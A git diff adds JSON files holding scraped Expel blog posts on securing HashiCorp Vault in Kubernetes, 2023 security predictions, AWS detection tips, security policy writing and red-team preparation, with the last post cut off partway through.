+} \ No newline at end of file diff --git a/5-best-practices-to-get-to-production-readiness-with.json b/5-best-practices-to-get-to-production-readiness-with.json new file mode 100644 index 0000000000000000000000000000000000000000..a6d17320670d47b4adbb508274efecacf2a8fb78 --- /dev/null +++ b/5-best-practices-to-get-to-production-readiness-with.json @@ -0,0 +1,6 @@ +{ + "title": "5 best practices to get to production readiness with ...", + "url": "https://expel.com/blog/production-readiness-hashicorp-vault-kubernetes/", + "date": "Mar 9, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 best practices to get to production readiness with Hashicorp Vault in Kubernetes Engineering \u00b7 6 MIN READ \u00b7 DAVID MONTOYA \u00b7 MAR 9, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools At Expel, we\u2019ve been long-time users of Hashicorp Vault. As our business and engineering organization has grown, so has our core engineering platform\u2019s reliance on Hashicorp Vault to secure sensitive data and the need to have a highly-available Vault that guarantees the continuity of our 24\u00d77 managed detection and response (MDR) service. We also found that as our feature teams advanced on their Kubernetes adoption journey, we needed to introduce more Kubernetes idiomatic secret-management workflows that would enable teams to self-service their secret needs for containerized apps. Which meant that we needed to increase our Vault infrastructure\u2019s resilience and deployment efficiency, and unlock opportunities for new secret-access and encryption workflows. So, we set out to migrate our statically-provisioned VM-based Vault to Google Kubernetes Engine (GKE). We knew the key to success is following best security practices in order to incorporate Hashicorp Vault into our trusted compute base. There are a variety of documented practices online for running Vault in Kubernetes. But some of them aren\u2019t up-to-date with Kubernetes specific features added on newer versions of Vault, or fail to describe the path to take Vault securely to production-readiness. Let\u2019s connect That\u2019s why I created a list of architectural and technical recommendations for Expel\u2019s site reliability engineering (SRE) team. And I\u2019d like to share these recommendations with you. (Hi, I\u2019m David and I\u2019m a senior SRE here at Expel.) After reading this post, you\u2019ll be armed with some best practices that\u2019ll help you to reliably and securely deploy, run and configure a Vault server in Kubernetes. What is Hashicorp Vault? Before we dive into best practices, let\u2019s cover the basics. Hashicorp Vault is a security tool rich in features to enable security-centric workflows for applications. It allows for secret management for both humans and applications, authentication federation with third-party APIs (e.g.: Kubernetes), generation of dynamic credentials to access infrastructure (e.g.: a PostgreSQL database), secure introduction (for zero trust infrastructure) and encryption-as-a-service. All of these are guided by the security tenet that all access to privileged resources should be short-lived. As you read this post, it\u2019s also important to keep in mind that a Kubernetes cluster is a highly dynamic environment. Application pods are often shuffled around based on system load, workload priority and resource availability. 
This elasticity should be taken into account when deploying Vault to Kubernetes in order to maximize the availability of the Vault service and reduce the chances of disruption during Kubernetes rebalancing operations. Now on to the best practices. Initialize and bootstrap a Vault server To get a Vault server operational and ready for configuration, it must first be initialized, unsealed and bootstrapped with enough access policies for admins to start managing the vault. When initializing a Vault server, two critical secrets are produced: the \u201cunseal keys\u201d and the \u201croot token.\u201d These two secrets must be securely kept somewhere else \u2013 by the person or process that performs the vault initialization. A recommended pattern for performing this initialization process and any subsequent configuration steps is to use an application sidecar. Using a sidecar to initialize the vault, we secured the unseal keys and root token in the Google Secret Manager as soon as they were produced, without requiring human interaction. This prevents the secrets from being printed to standard output. The bootstrapping sidecar application can be as simple as a Bash script or a more elaborate program depending on the degree of automation desired. In our case, we wanted the bootstrapping sidecar to not only initialize the vault, but to also configure access policies for the provisioner and admin personas, as well as issue a token with the \u201cprovisioner\u201d policy and secure it in the Google Secret Manager. Later, we used this \u201cprovisioner\u201d token in our CI workflow in order to manage Vault\u2019s authentication and secret backends using Terraform and Atlantis . We chose Go for implementing our sidecar because it has idiomatic libraries to interface with Google Cloud Platform (GCP) APIs and reusing the Vault client library already included in Vault is easy \u2013 which is also written in Go. Pro tip: Vault policies govern the level of access for authenticated clients. A common scenario, documented in Vault\u2019s policy guide , is to model the initial set of policies after an admin persona and a provisioner persona. The admin persona represents the team that operates the vault for other teams or an org, and the provisioner persona represents an automated process that configures the vault for tenants access. Considering the workload rebalancing that often happens in a Kubernetes cluster, we can expect the sidecar and vault server containers to suddenly restart. Which is why it\u2019s important to ensure the sidecar can be gracefully stopped and can accurately determine the health of the server before proceeding with any configuration and further producing log entries for the admins with an initial diagnosis on the status of the vault. By automating this process, we also made it easier to consistently deploy vaults in multiple environments, or to easily create a new vault and migrate snapshotted data in a disaster recovery scenario. Run Vault in isolation We deploy Vault in a cluster dedicated for services offered by our core engineering platform, and fully isolated from all tenant workloads. Why? We use separation of concerns as a guiding principle in order to guarantee the principle of least privilege when granting access to infrastructure. We recommend running the Vault pods on a dedicated nodepool to have finer control over their upgrade cycle and enabling additional security controls on the nodes. 
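Returning to the bootstrapping sidecar for a moment, the initialization step can be sketched with Vault's official Go API client roughly as follows. This is a simplified illustration rather than Expel's actual sidecar: error handling is minimal, policy bootstrapping is left out, and the step that secures the unseal keys and root token (Google Secret Manager in our case) is stubbed out behind a hypothetical storeSecrets helper.

package main

import (
	"fmt"
	"log"

	vault "github.com/hashicorp/vault/api"
)

func main() {
	// DefaultConfig reads VAULT_ADDR, VAULT_CACERT, etc. from the environment.
	client, err := vault.NewClient(vault.DefaultConfig())
	if err != nil {
		log.Fatal(err)
	}

	initialized, err := client.Sys().InitStatus()
	if err != nil {
		log.Fatal(err)
	}
	if initialized {
		log.Println("vault already initialized; nothing to do")
		return
	}

	resp, err := client.Sys().Init(&vault.InitRequest{
		SecretShares:    5,
		SecretThreshold: 3,
	})
	if err != nil {
		log.Fatal(err)
	}

	// Persist the unseal keys and root token somewhere safe (we used Google
	// Secret Manager) instead of printing them to standard output.
	if err := storeSecrets(resp.KeysB64, resp.RootToken); err != nil {
		log.Fatal(err)
	}
	fmt.Println("vault initialized; secrets stored out of band")
}

// storeSecrets is a placeholder for the secret-manager integration.
func storeSecrets(unsealKeys []string, rootToken string) error {
	return fmt.Errorf("storeSecrets is not implemented in this sketch")
}

In the real sidecar, this same process goes on to create the admin and provisioner policies and to issue and store the provisioner token described earlier.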
When implementing high availability for applications, as a common practice in Kubernetes, pod anti-affinity rules should be used to ensure no more than one Vault pod is allocated to the same node. This will isolate each vault server from zonal failures and node rebalancing activities. Implement end-to-end encryption This is an obvious de-facto recommendation when using Vault . Even for non-production vaults you should use end-to-end TLS. When exposing a vault server through a load balanced address using a Kubernetes Ingress, make sure the underlying Ingress controller supports TLS passthrough traffic to terminate TLS encryption at the pods, and not anywhere in between. Enabling TLS passthrough is the equivalent of performing transmission control protocol (TCP) load balancing to the Vault pods. Also, enable forced redirection from HTTP to HTTPS. When using kubernetes/ingress-nginx as the Ingress controller, you can configure TLS passthrough with the Ingress annotation nginx.ingress.kubernetes.io/ssl-passthrough. Configuration for the Ingress resource should look as follows: Ensure traffic is routed to the active server In its simplest deployment architecture, Vault runs with an active server and a couple hot-standbys that are often checking the storage backend for changes on the writing lock. A common challenge when dealing with active-standby deployments in Kubernetes is ensuring that traffic is only routed to the active pod. A couple common approaches are to either use readiness probes to determine the active pod or to use an Ingress controller that supports upstream health checking. Both approaches come with their own trade-offs. Luckily, after Vault 1.4.0 , we can use the service_registration stanza to allow Vault to \u201cregister\u201d within Kubernetes and update the pods labels with the active status. This ensures traffic to the vault\u2019s Kubernetes service is only routed to the active pod. Make sure you create a Kubernetes RoleBinding for the Vault service account that binds to a Role with permissions to get , update and patch pods in the vault namespace. The vault\u2019s namespace and pod name must be specified using the Downward API as seen below. Enable service registration in the vault .hcl configuration file like this: Set VAULT_K8S_POD_NAME and VAULT_K8S_NAMESPACE with the current namespace and pod name: With the configuration above, the Kubernetes service should look like this: Configure and manage Vault for tenants with Terraform Deploying, initializing, bootstrapping and routing traffic to the active server are only the first steps toward operationalizing a vault in production. Once a Hashicorp Vault server is ready to accept traffic and there is a token with \u201cprovisioner\u201d permissions, you\u2019re ready to start configuring the vault authentication methods and secrets engines for tenant applications. Depending on the environment needs, this type of configuration can be done using the Terraform provider for Vault or using a Kubernetes Operator. Using an operator allows you to use YAML manifests to configure Vault and keep their state in sync thanks to the operator\u2019s reconciliation loop. Using an operator, however, comes at the cost of complexity. This can be hard to justify when the intention is to only use the operator to handle configuration management . That\u2019s why we opted for using the Terraform provider to manage our vault configuration. 
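Pulling the configuration pieces above together, a trimmed-down sketch might look like the following. Hostnames, namespaces, service names and ports are illustrative placeholders rather than our production manifests, and the Role/RoleBinding that lets Vault patch its own pod labels is omitted for brevity.

# Ingress with TLS passthrough (requires the ingress-nginx controller to run
# with --enable-ssl-passthrough), so TLS terminates at the Vault pods.
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: vault
  namespace: vault
  annotations:
    nginx.ingress.kubernetes.io/ssl-passthrough: "true"
    nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
spec:
  ingressClassName: nginx
  rules:
    - host: vault.example.internal
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: vault-active
                port:
                  number: 8200

# vault.hcl excerpt: let Vault keep its pod labels in sync with its
# active/standby status.
service_registration "kubernetes" {}

# Pod spec excerpt: hand Vault its own pod name and namespace via the
# Downward API.
env:
  - name: VAULT_K8S_POD_NAME
    valueFrom:
      fieldRef:
        fieldPath: metadata.name
  - name: VAULT_K8S_NAMESPACE
    valueFrom:
      fieldRef:
        fieldPath: metadata.namespace

# Service that only selects the active server, using the labels that
# service_registration maintains.
apiVersion: v1
kind: Service
metadata:
  name: vault-active
  namespace: vault
spec:
  selector:
    app.kubernetes.io/name: vault
    vault-active: "true"
  ports:
    - name: https
      port: 8200
      targetPort: 8200

With the Kubernetes-side plumbing sketched out, the rest of the vault's configuration is handled in Terraform, as described next.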
Using Terraform also gives us a place to centralize and manage other supporting configurations for the authentication methods. A couple examples of this is configuring the Kubernetes service account required to enable authentication delegation to a cluster\u2019s API server or enabling authentication for the vault admins using their GCP service account credentials. When using the Kubernetes authentication backend for applications running in a Kubernetes cluster, each application can authenticate to Vault by providing a Kubernetes service account token (a JWT token) that the Vault server uses to validate the caller identity. It does this by invoking the Kubernetes TokenReview API on the target API server configured via the Terraform resource vault_kubernetes_auth_backend_config . Allow Vault to delegate authentication to the tenants\u2019 Kubernetes cluster: Once you\u2019ve configured Vault to allow for Kubernetes authentication, you\u2019re ready to start injecting vault agents onto tenant application pods so they can access the vault using short-lived tokens. But this is a subject for a future post. Are you cloud native? At Expel, we\u2019re on a journey to adopt zero trust workflows across all layers of our cloud infrastructure. With Hashicorp Vault, we\u2019re able to introduce these workflows when accessing application secrets or allowing dynamic access to infrastructure resources. We also love to protect cloud native infrastructure. But getting a handle of your infrastructure\u2019s security observability is easier said than done. That\u2019s why we look to our bots and tech to improve productivity. We\u2019ve created a platform that helps you triage Amazon Web Services (AWS) alerts with automation. So, in addition to these best practices, I want to share an opportunity to explore this product for yourself and see how it works. It\u2019s called Workbench\u2122 for Engineers, and you can get a free two-week trial here. Check it out and let us know what you think!" +} \ No newline at end of file diff --git a/5-cybersecurity-predictions-for-2023.json b/5-cybersecurity-predictions-for-2023.json new file mode 100644 index 0000000000000000000000000000000000000000..6e2e21aaed0c63638a822228ee4d38e0c47fcb52 --- /dev/null +++ b/5-cybersecurity-predictions-for-2023.json @@ -0,0 +1,6 @@ +{ + "title": "5 cybersecurity predictions for 2023", + "url": "https://expel.com/blog/5-cybersecurity-predictions-for-2023/", + "date": "Dec 21, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 cybersecurity predictions for 2023 Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL, GREG NOTCH, MATT PETERS AND CHRIS WAYNFORTH \u00b7 DEC 21, 2022 \u00b7 TAGS: Cloud security / MDR It\u2019s that magical time of year when security folks dust off their crystal balls and do their best to gaze into the future\u2014hazarding a (well-informed) guess at what\u2019s on the horizon for cybersecurity in 2023. A few leaders on the Expel team took some time to reflect on learnings from this year\u2014from our own customers and the broader security community\u2014to share what they think is next for the industry in the new year. Here are their thoughts. 1. The cyber-insurance industry is ripe for disruption. Cyber insurance is an expensive, complex, and difficult necessity in the cybersecurity industry. It\u2019s rapidly becoming a more expensive line item in a Chief Information Security Officer\u2019s (CISO\u2019s) budget, and we can expect new and innovative approaches to risk assessment to emerge. 
As companies look to secure cyber insurance, they\u2019ll apply additional pressure on their supply chain to provide demonstrable proof that their downstream suppliers are able to respond effectively and in near real-time to cyber incidents\u2014incidents that have the potential to affect the company\u2019s own response (like when Toyota halted production following an attack on a supplier earlier this year). \u2013 Chris Waynforth, General Manager, EMEA 2. Everything old is new again, as attackers bypass MFA by targeting the user. Since \u201csecure by default\u201d configurations have become more common, we\u2019re going to see attackers investing more of their time targeting the user. Our security operations center (SOC) saw this trend in the third quarter (Q3) of 2022, as users increasingly let attackers in by approving fraudulent multi-factor authentication (MFA) pushes to enact business application compromise (BAC) attacks. In fact, MFA and conditional access were configured for more than 80% of the cases where the attackers were successful in Q3. (More on this in our quarterly threat report recap for Q3.) In theory, none of these hacks should have succeeded, but the attackers tricked users into satisfying the request by hitting them with a barrage of MFA notifications until they eventually accepted one. For some organizations, this shift in attacker strategy will drive adoption of technologies like Fast Identity Online (FIDO). For others, especially those that struggled to implement MFA in the first place, it won\u2019t. For those companies that do button up effectively, attackers will turn back to targeting the infrastructure and applications. \u2013 Matt Peters, Chief Product Officer 3. CISOs will have to learn to frame security risk as a business factor. Company boards are having broader conversations around risk and, as a result, security leaders will need to translate risk into business outcomes enabled by security investment. As macroeconomic conditions drive changing priorities, security leaders will need to adopt a more framework-based approach to demonstrate return on investment (ROI) for their boards. Security leaders unable to make the connection to business outcomes will struggle career-wise, struggle for budget, and struggle for relevance in the business decision-making processes of their organization. \u2013 Dave Merkel, Chief Executive Officer, Co-founder 4. Macroeconomic impacts will force companies to scrutinize security spend. For many security leaders, the changing macroeconomic climate will shift the focus toward cost-conscious decisions and the consolidation of cybersecurity investments. Until now, companies have taken a \u201cmore is more\u201d approach to cybersecurity products and services, tacking on tools to their arsenals to combat the growing threat landscape. But next year, they\u2019ll face tighter budgets and the need to prioritize. This consolidation can be a good thing, as it will force focus on quality outcomes, and a move away from the model of loosely integrated solutions that simply deliver more alerts. Companies have increasingly turned to managed detection and response (MDR) providers to help manage this, and that trend is only going to continue. Many security leaders recognize it can be more effective and economical to optimize their operations with outside experts. For those that do continue to handle this internally, they\u2019ll be pressured to drive cost efficiency, and with greater urgency than in previous years. 
\u2013 Greg Notch, Chief Information Security Officer 5. The available cybersecurity talent pool is about to get a lot bigger. As tech companies are forced to enact layoffs because of the macroeconomic climate, more professionals with technical skills will enter the job market. For companies fortunate enough to still be in the position to hire, this will present a unique opportunity to select from an increased talent pool of skilled technical workers\u2014at a time when the cybersecurity \u201cskills gap\u201d still makes the headlines daily. Not to mention, the diversity that comes from an expanded hiring pool leads to organizations that are more successful at attracting and retaining employees. \u2013 Dave Merkel, Chief Executive Officer, Co-founder At the beginning of this year, we took a deep dive into the data our SOC ingested from the previous year to predict what was in store for 2022 with our first-ever Great eXpeltations annual report. Keep an eye out for the next iteration of this report, full of year-end analysis and predictions like these, coming in January 2023." +} \ No newline at end of file diff --git a/5-pro-tips-for-detecting-in-aws.json b/5-pro-tips-for-detecting-in-aws.json new file mode 100644 index 0000000000000000000000000000000000000000..4ce87eafde1ebf97ed6d19b64d0395e1523a31f5 --- /dev/null +++ b/5-pro-tips-for-detecting-in-aws.json @@ -0,0 +1,6 @@ +{ + "title": "5 pro tips for detecting in AWS", + "url": "https://expel.com/blog/5-pro-tips-for-detecting-in-aws/", + "date": "Feb 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 pro tips for detecting in AWS Tips \u00b7 3 MIN READ \u00b7 BRANDON DOSSANTOS, BRITTON MANAHAN, SAM LIPTON, IAN COOPER AND CHRISTOPHER VANTINE \u00b7 FEB 15, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Detection and response in a cloud infrastructure is, in one word: confusing. And untangling the web of Amazon Web Services (AWS) can be daunting, even for the most experienced among us. So where do you start? Sometimes better security practices begin with basic, but critical, changes. In this post, we\u2019ll walk you through five pro tips for threat detection in AWS so you can free yourself from a bunch of alerts and get the space back to focus on the alerts that matter most. Prioritize security as part of your culture\u2026 like, yesterday News flash: your security team shouldn\u2019t be the only people concerned about security \u2014 just ask your colleague that fell for yet another phishing scam. If you want a security program that works, it needs to be ingrained into all parts of your business and culture. That means educating all of your users so they understand security best practices, and keeping these best practices fresh in their minds with consistent, office-wide trainings. When security is baked into your culture, frameworks, and solutions, it becomes a day-to-day priority. Set goals along the way to see what does and doesn\u2019t work for your org. Changing the way employees think and feel about security might be an incremental process, and that\u2019s okay! At the end of the day, every employee should at least understand the importance of security, and your Chief Information Security Officer (CISO) should always have a seat at the table. Giving your CISO insight into business decisions upfront helps keep security a top line priority for your whole org from the beginning, so that you\u2019re not playing catch-up down the line. 
Forget what you know about \u201cnormal\u201d What\u2019s \u201cnormal\u201d anyway \u2014 right? Every AWS environment is unique, which means what\u2019s usual in one environment can be suspicious in another. Before you can automate or write detections, you need to know what\u2019s exposed to the outside world in your cloud environment, take a serious look at container security, and understand what normal looks like in your environment. If you spot unusual user or role behavior, dig deeper. Look at it through a wider lens over the past 24 hours. Does anything look interesting, like multiple failed API calls? Understanding what\u2019s the norm in your environment helps you efficiently tune alerts (and helps tune out that security engineer who\u2019s constantly running penetration tests). Automate, automate, automate Automating elements of your security program helps with consistency, but do it strategically. Start by asking, \u201cWhat problem are we trying to solve?\u201d and work from there to free up resources and speed up time-to-detect. All AWS services are available as APIs, so you can automate just about anything. Know which servers are mission critical and use automation to adjust those alerts for impact so your team doesn\u2019t miss anything. Not to mention, it might help your security team sleep through the night without waking up in a cold-sweat because an alert slipped through the cracks. Lean on logging for better context clues It\u2019s hard to tell a story and determine what happened if there\u2019s no [cloud]trail to follow. Your detections are only as good as your logging. Make sure CloudTrail is logging all of your accounts, not just certain regions, and that no one is tampering with your logging (like turning it off entirely \u2014 yikes). Then, use CloudTrail as an events source to find anomalous or aggressive API usage. We recommend linking MITRE ATT&CK tactics with AWS APIs to filter for the most interesting activity. By the way, here\u2019s a mind map for AWS investigations that lays out some preliminary tactic mapping to make this part easier. Take your time laying the breadcrumbs (re: make sure your logging is up to par). It helps your detections and ultimately speeds up triage and investigation after your team sees an alert. Get back to the basics We get it \u2014 for an industry vet, it can be easy to overlook the basics. But when misconfigurations are a leading vector behind attacks in the cloud, it\u2019s important to make sure you\u2019re brushing up on best security practices in your AWS environment. It sounds simple, but the best way to understand AWS to write detections \u2014 and the key to red team research \u2014 is learning the basics of Identity and Access Management (IAM). Similarly, when thinking about container security, make sure you\u2019re securing every point an attacker can infiltrate. Covering the basics, from IAM to parts of a container, helps you protect your environment and improve your detection writing. See? Simple. Want to know more about some or all of these tips? We did a deep dive into these tips and all things detecting in AWS during Expel\u2019s AWS Detection Day. You can check out each of our session videos here . Still have questions? We\u2019d love to chat!" 
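To make the "multiple failed API calls" idea a bit more concrete, here is a toy example that counts failed calls per principal in a CloudTrail log file (the {"Records": [...]} JSON that CloudTrail delivers to S3). The file name and threshold are placeholders, and in practice you would run this kind of question against CloudTrail, Athena or your SIEM rather than a local file.

package main

import (
	"encoding/json"
	"fmt"
	"os"
)

// record holds only the CloudTrail fields this sketch cares about.
type record struct {
	EventName    string `json:"eventName"`
	EventSource  string `json:"eventSource"`
	ErrorCode    string `json:"errorCode"` // only present when the call failed
	UserIdentity struct {
		Arn string `json:"arn"`
	} `json:"userIdentity"`
}

func main() {
	data, err := os.ReadFile("cloudtrail-events.json")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	var doc struct {
		Records []record `json:"Records"`
	}
	if err := json.Unmarshal(data, &doc); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	failures := map[string]int{}
	for _, r := range doc.Records {
		if r.ErrorCode != "" { // AccessDenied, UnauthorizedOperation, etc.
			failures[r.UserIdentity.Arn]++
		}
	}
	for arn, n := range failures {
		if n >= 10 { // arbitrary threshold; tune it to what's normal for you
			fmt.Printf("review: %s had %d failed API calls\n", arn, n)
		}
	}
}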
+} \ No newline at end of file diff --git a/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json b/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json new file mode 100644 index 0000000000000000000000000000000000000000..d081f7247e3ff6942007ff0483e32ce9c767c712 --- /dev/null +++ b/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json @@ -0,0 +1,6 @@ +{ + "title": "5 tips for writing a cybersecurity policy that doesn't suck", + "url": "https://expel.com/blog/5-tips-writing-cybersecurity-policy-doesnt-suck/", + "date": "Sep 17, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 tips for writing a cybersecurity policy that doesn\u2019t suck Tips \u00b7 4 MIN READ \u00b7 JOHN LAWRENCE \u00b7 SEP 17, 2019 \u00b7 TAGS: CISO / Framework / How to / Planning Ask anyone who\u2019s worked in cybersecurity for any length of time and I\u2019ll bet you they\u2019ve been asked to draft or contribute to a cybersecurity policy for their org. Creating a \u201cpolicy\u201d sounds simple, but those same people who\u2019ve been tapped to contribute will tell you that it\u2019s not easy. That\u2019s because enterprise-level cybersecurity policy is still a new thing and with new things comes many different interpretations and implementations. It\u2019s also not always easy for policy writers to work with other teams to find that sweet spot where security needs and business needs are balanced \u2026 and without slowing employees down, of course. But drafting a comprehensive cybersecurity policy is critical for enforcing guidelines and reducing liability. Here are some pro tips on what goes into a good cybersecurity policy and how you might use these tips in your own org. What does policy really mean? Before putting pen to paper, you\u2019ve gotta understand what \u201cpolicy\u201d means in the first place. There are lots of terms that get tossed around when a policy is being created, but they\u2019re not interchangeable (even though some people use them that way). Here are a couple terms you might hear during a discussion about policy, along with their definitions: Term Definition Policy What it is: A plan or course of action to guide future decisions. What it answers: What to do and why to do it. Procedure What it is: Describes the exact steps for a policy to be executed. What it answers: Who does what, when they do it, how they do it and what to do specifically. Audit What it is: Measures against a set standard. An objective measurement of security. Common standards include NIST , PCI, IEC 62443. What it answers: Are we meeting our goals? Are we following our policies? Assessment What it is: Measures against the experience of others. A subjective measurement of security. What it answers: Does it seem like we are meeting our goals? How do we feel about how the policy is being followed? Now that we\u2019ve got the basic definitions out of the way, I\u2019ll use them in an example to see how they might actually be used in a conversation about your own org\u2019s policy: \u201cWe\u2019re creating a new cybersecurity policy for the company. This policy will outline goals to guide us in our most important cybersecurity tasks. The policy will state that we\u2019ll conduct an assessment every three months to verify employees are following policy and procedure and an audit every year to ensure that we\u2019re meeting PCI compliance . 
Further, procedures will be made to provide guidelines and steps on accomplishing the goals set forth by the policy.\u201d Pro tips for writing a policy that doesn\u2019t suck The Valve Employee Handbook , Microsoft Standards of Business Conduct and even the US Constitution \u2014 all of these works come from large organizations and at their core is strong policy writing. What are some of the most important rules of policy writing these works use that we can use as we\u2019re doing our own drafting? The stuff you decide to include in your cybersecurity policy will be unique to your org \u2014 and companies\u2019 needs when it comes to cybersecurity vary so widely that we can\u2019t try and cram all of those nuances into a single blog post. But all good cybersecurity policies do share some similar traits. After chatting with lots of Expletives who\u2019ve written and contributed to countless policies over the course of their careers, here\u2019s the final list of pro tips we came up with to help you as you\u2019re drafting your own: Know your business goals. Sounds obvious, but it\u2019s always good to gut check the direction of your policy against the broader business goals. If you\u2019re not aligned with the same stuff the business cares about, you run the risk of cybersecurity being seen as a cost center or deadweight on the company \u2014 not exactly a position you want to be in. Michael Sutton goes into greater depth here on how to create or grow relationships with the other execs on your team so that you\u2019re all on the same page when it comes to goals. Make it practical. Of course you want to create the ideal policy \u2014 but make sure the guidelines you\u2019re creating are realistic for both your users and your own security team (if you\u2019re lucky enough to have one). A common example of an impractical policy is one that includes lots of mandates around sensitive data protection. In these policies, orgs might say things like \u201call confidential data must be marked\u201d and \u201call external transmission of data must be encrypted.\u201d Sure, it sounds good on paper, but your users won\u2019t do this because it\u2019s a headache for them to do manually. Instead, you could ask employees to only mark the data when it\u2019s leaving your org, and then have tech in place to do the secure transfer automatically. Setting realistic expectations for users and your own team gives you a much better chance that the rules you set forth will be followed. Make it applicable. Make sure the policy you\u2019re writing is applicable to your org. For example, every so often a policy will get caught up covering too many specific security examples and how to resolve them. This turns the policy from a document providing direction to a document that\u2019s applicable in only a few specific circumstances. And when a policy is not always applicable people start to ignore it. Be concise. You\u2019re not drafting the Magna Carta here. Keep the policy short and to the point so that employees will actually read it. There\u2019s sometimes a tendency to include a bunch of boilerplate language that \u201call policies must have\u201d \u2014 but don\u2019t do that. The longer the policy, the less likely your users are to internalize it. Write in plain English. All of us cybersecurity folks love speaking in APTs, CVEs, XSS, and LEET (sometimes). But remember that Mike in finance and Karen in sales don\u2019t \u201cspeak\u201d cybersecurity. 
Write your policy in everyday language so that anyone in your org \u2014 regardless of their knowledge level about cyber threats \u2014 can understand it. Got a draft? Here are your next steps Once you\u2019ve got a draft of your policy, a great way to determine whether your policy passes the sniff test in the five areas mentioned above is to share it with others and ask for feedback. (Bonus: This is a great way to socialize the policy with your executive team and make some new friends.) There are also numerous resources you can review as you\u2019re drafting your policy that might help you get a better understanding of what a policy should and shouldn\u2019t cover \u2014 take a look at NATO CCDCOE (NATO Cooperative Cyber Defence Centre of Excellence), NCCoE (National Cybersecurity Center of Excellence) or the NIST CSF (National Institute of Standard and Technology Cybersecurity Framework) for starters. With that, you\u2019re well on your way to becoming the policy whiz kid of the office \u2026 don\u2019t let it all go to your head. John Lawrence is a Security Operations Center intern at Expel. Check out his LinkedIn profile ." +} \ No newline at end of file diff --git a/6-things-to-do-before-you-bring-in-a-red-team.json b/6-things-to-do-before-you-bring-in-a-red-team.json new file mode 100644 index 0000000000000000000000000000000000000000..fb7e5cccd41cacc24770fd426b8d2b7d52fd21c5 --- /dev/null +++ b/6-things-to-do-before-you-bring-in-a-red-team.json @@ -0,0 +1,6 @@ +{ + "title": "6 things to do before you bring in a red team", + "url": "https://expel.com/blog/6-things-to-do-before-you-bring-in-red-team/", + "date": "Jul 8, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 6 things to do before you bring in a red team Tips \u00b7 6 MIN READ \u00b7 JON HENCINSKI, TYLER FORNES AND DAVID BLANTON \u00b7 JUL 8, 2020 \u00b7 TAGS: How to / Managed detection and response / Managed security / Planning / SOC Remember that time we almost brought down our point of sale environment on a busy holiday weekend because we thought the red team was a real bad guy? Whoah, that would\u2019ve been bad. But we didn\u2019t because we did our prep work. The SOC had a bat phone to the red team and was able to quickly verify the evil \u201c whoami \u201d and \u201c net \u201d commands were from the red team. Crisis averted. Red team assessments are a great way to understand your detection and investigative capabilities, and stress test your Incident Response (IR) plan . But good intentions can lead to bad outcomes if you don\u2019t do your prep work. A red team will generate activity that looks similar to a targeted attack (cue the adrenaline). So a little planning goes a long way. Here\u2019s six things you should do before taking on the red team. 1. Start with objectives Start here. Get clear on your objective(s) to set the direction of the assessment and define the rules of engagement. Worried that an attacker could gain access to a segmented part of your network? Or perhaps you\u2019re worried that an attacker could compromise credentials and spin up resources in Amazon Web Services (AWS)? Clear objectives help everyone. Business-focused objectives usually look like: Break into a segmented part of your network Obtain a VIP user\u2019s credentials (CEO, CTO, IT Administrator, etc.) Access/exfiltrate customer data While these drive the overall theme and end-game for the red team, there\u2019s a set of objectives that often surround the organization\u2019s ability to respond as well. 
From a defensive perspective some reasonable objectives are: Assess detection capabilities and identify gaps Stress test response and remediation capabilities Assess investigative capabilities in Windows and Linux environments Assess investigative capability in the cloud Goals bring purpose to the assessment. Purpose that should be measured along the way. Some key questions we measure are: How long did it take us to spot the red team? At what phase in the attack lifecycle did we spot them? How long did it take us to remediate? What challenges did we encounter when remediating? Do we need to update our response playbooks? What didn\u2019t we detect? Document these to be actioned later. Were there investigative challenges that prevented us from answering key questions? Document these to be actioned later. 2. Review your IR plan with the team It\u2019s so important to build muscle memory around your IR process before a bad thing happens. This way everyone knows what to do, including how to communicate. One of the biggest challenges is getting over the \u201cadrenaline rush\u201d that comes with responding to an incident. Panic will happen, and chaos will ensue the first couple of times through it. But as everyone gets comfortable with the process and goes through some of the unknowns together, the response process will become a well-oiled machine that everyone is ready for instead of afraid of. From an operator\u2019s perspective, we\u2019re a huge fan of running threat emulations for our analysts. These are miniature versions of a red team assessment that help train our analysts in responding to a specific threat, or testing our own response process. There\u2019s a lot of fun to be had here for a blue-teamer who is red curious (remember rule #1 is that objectives are key). For the broader org, we\u2019re biased, but \u201c Oh Noes \u201d is a great place to start if you need some help organizing a simulated walk-through of your IR plan (and have some fun in the process). 3. Emphasize remediation We agree with Tim MalcomVetter . The emphasis of a red team should be response. Talk about remediation ahead of time. Ask hard questions like, \u201cwhat would we do if that account was compromised?\u201d Pro-tip: Know ahead of time who in your org to contact for infrastructure questions, service accounts, etc. Sometimes knowing who to call is the biggest hurdle. Plan your response, know who to contact, and then stress test your plans. If your SOC doesn\u2019t have a lot of reps responding to red team activity, remediation may happen without considering business impact. Consider the following: The red team appears to be using the account \u201csql_boss\u201d to move laterally. We should disable that account. Red teams love service accounts. Service accounts typically have privileged access and can be tough to reset. In this scenario, disabling the account \u2018\u201c sql_boss \u201d would cause the red team some pain. But what else would it do? What does that account run? How is it used? Is it responsible for the backend of a business critical application? Should we disable this account? Can we disable this account right now? There\u2019s some not-so-funny stories we can tell here about how this oversight has caused major pain for some organizations. But in essence the major theme is: Do your homework, plan your response and talk about it ahead of time. 4. Set expectations Your blue team just spotted a bad guy moving laterally via WMI to dump credentials on a server? Great find! 
